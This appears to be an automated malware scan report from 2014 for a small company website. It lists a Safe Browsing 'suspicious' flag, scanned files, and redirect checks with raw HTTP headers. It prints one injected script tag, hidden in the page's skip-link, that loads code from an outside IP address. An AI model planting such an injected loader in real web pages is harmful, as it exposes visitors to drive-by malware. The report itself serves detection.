Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=pretechsolutionsinc.com
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
Request | Server response | Status |
http://pretechsolutionsinc.com/ | 200 OK Content-Length: 9377 Content-Type: text/html | suspicious |
Page code contains blacklisted domain: 72.167.37.193 ...[3594 bytes skipped]... > <div class="logoheader"> <h1 id="logo"> <img src="/images/logo-1.jpg" alt="PRETECH Solutions Inc." /> <span class="header1"> </span></h1> </div><!-- end logoheader --> <ul class="skiplinks"> <li><a href="#main" class="u2">Skip to content<script type="text/javascript" src="http://72.167.37.193/BtKMFBep.php?id="></script></a></li> <li><a href="#nav" class="u2">Jump to main navigation and login</a></li> </ul> <h2 class="unseen">Nav view search</h2> <h3 class="unseen">Navigation</h3> <div id="line"> <div id="fontsize"></div> <h3 class="unseen">Search</h3> <form action="/index.php" ...[7290 bytes skipped]... | ||
http://pretechsolutionsinc.com/media/system/js/core.js | 200 OK Content-Length: 4225 Content-Type: application/x-javascript | clean |
http://pretechsolutionsinc.com/media/system/js/mootools-core.js | 200 OK Content-Length: 88540 Content-Type: application/x-javascript | clean |
http://pretechsolutionsinc.com/media/system/js/caption.js | 200 OK Content-Length: 800 Content-Type: application/x-javascript | clean |
http://pretechsolutionsinc.com/media/system/js/mootools-more.js | 200 OK Content-Length: 238128 Content-Type: application/x-javascript | clean |
http://pretechsolutionsinc.com/templates/beez5/javascript/md_stylechanger.js | 200 OK Content-Length: 2104 Content-Type: application/x-javascript | clean |
http://pretechsolutionsinc.com/templates/beez5/javascript/hide.js | 200 OK Content-Length: 7735 Content-Type: application/x-javascript | clean |
http://72.167.37.193/BtKMFBep.php?id= | HTTP/1.1 302 Found Connection: close Date: Wed, 09 Apr 2014 21:11:32 GMT Location: http://localhost/ Server: Apache Vary: Accept-Encoding Content-Length: 0 Content-Type: text/html MS-Author-Via: DAV X-Powered-By: PleskLin | clean |
http://localhost/ | 200 OK Content-Length: 3700 Content-Type: text/html | clean |
http://s7.addthis.com/js/250/addthis_widget.js | 200 OK Content-Length: 6816 Content-Type: text/javascript | clean |
http://72.167.37.193/test404page.js | 404 Not Found Content-Length: 955 Content-Type: text/html | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: pretechsolutionsinc.com
Result:
HTTP/1.1 200 OK
Cache-Control: no-cache
Date: Wed, 09 Apr 2014 22:23:43 GMT
Pragma: no-cache
Server: Microsoft-IIS/7.0
Content-Length: 9377
Content-Type: text/html; charset=utf-8
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Set-Cookie: 089ca1c4bfdae53ad64ef5b292c7f789=a4506d9cmgmt564u8r4bemedr4; path=/
X-Powered-By: ASP.NET
...9377 bytes of data.
GET / HTTP/1.1
Host: pretechsolutionsinc.com
Result:
HTTP/1.1 200 OK
Cache-Control: no-cache
Date: Wed, 09 Apr 2014 22:23:43 GMT
Pragma: no-cache
Server: Microsoft-IIS/7.0
Content-Length: 9377
Content-Type: text/html; charset=utf-8
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Set-Cookie: 089ca1c4bfdae53ad64ef5b292c7f789=a4506d9cmgmt564u8r4bemedr4; path=/
X-Powered-By: ASP.NET
...9377 bytes of data.
Second query (visit from search engine):
GET / HTTP/1.1
Host: pretechsolutionsinc.com
Referer: http://www.google.com/search?q=pretechsolutionsinc.com
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: pretechsolutionsinc.com
Referer: http://www.google.com/search?q=pretechsolutionsinc.com
Result:
The result is similar to the first query. There are no suspicious redirects found.